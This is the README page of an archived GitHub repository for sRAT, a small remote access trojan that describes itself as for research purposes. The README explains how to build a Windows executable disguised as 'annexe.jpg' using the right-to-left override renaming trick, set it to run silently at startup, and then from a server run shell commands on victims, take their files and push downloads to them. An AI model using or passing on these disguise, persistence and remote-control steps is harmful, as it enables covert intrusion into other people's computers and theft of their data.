Skip to content
This repository has been archived by the owner on Nov 6, 2021. It is now read-only.
/ sRAT Public archive

A small remote access trojan, for research purposes.

8 stars 4 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

ychalier/sRAT

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

59 Commits
release
release
 
 
src
src
 
 
.classpath
.classpath
 
 
.gitignore
.gitignore
 
 
.project
.project
 
 
README.md
README.md
 
 

Repository files navigation

sRAT

A small remote access trojan, for research purposes.

git usage

Always use branches when implementing a feature or a fix, with syntax feature/yourName/featureName or fix/yourName/bugToFix, and be careful when merging.

[windows] build exe

(requires Autoitv3, Aut2exe and Resource Hacker)

  1. Compile MainClient.java as a runnable jar

  2. Compile srat.au3 into an executable

    aut2exe.exe /In srat.au3 /out ann.exe /icon img.ico

  3. Add the jar file as a resource into the executable, with data-type RCDATA and name JAR

    reshacker.exe -add ann.exe ann.exe client.jar RCDATA JAR

  4. Rename file with RTLO method

    python rtlo.py ann.exe

Then we end up with a file annexe.jpg, that, when executed, copies client.jar into current user AppData folder, and creates a srat.bat file in windows startup folder that silently starts the jar at startup.

server usage

You may insert commands after the > prompt. At any time, you can list commands typing help.

global server commands

command argument description
help display all commands
exit close server
list list all connected clients
select id select a client, given its id. opens a connection.
unselect unselect the client. close the connection.
log [nRows] prints out the log ; if an argument is passed, prints the selected amount of lines.
save_clients save clients info to an external file, named clients.

seleted client commands

command argument description
info display all information about the selected client
exec command make the client execute a given shell command
upld clientFile serverFile upload a file from the client to the server
dwnld fileUrl localFile make the client download a file given by its url

select client

list all connected clients

To display all connected clients, use

>list

It will output a two-column array, with ids and MACs of all connected clients.

>list
id     MAC address         IP Address     OS
1234   AA-BB-CC-DD-EE-FF   /192.168.1.2   Windows 10
5678   00-11-22-33-44-55   /192.168.1.3   Windows 7

select one client

To selcet a client, use select ID. For example,

>select 1234
Selected client 1234
1234*>

It may take up to 10 seconds to connect (the time between two clients ping). Now the prompt should begin as follows:

Client 1234 connected.
1234>

execute a command

When a client is selected, make it execute a command with exec YOUR_COMMAND.

1234>exec ipconfig
Added command to stack

It might take a few seconds, and then the output will be printed. If the client is using Windows, you can start any shell command with

1234>exec cmd.exe /C YOUR_COMMAND

The output will be sent back to you.

About

A small remote access trojan, for research purposes.

Topics

socket-communication socket-server rat remote-access-trojan

Resources

Readme
Activity

Stars

8 stars

Watchers

3 watching

Forks

4 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages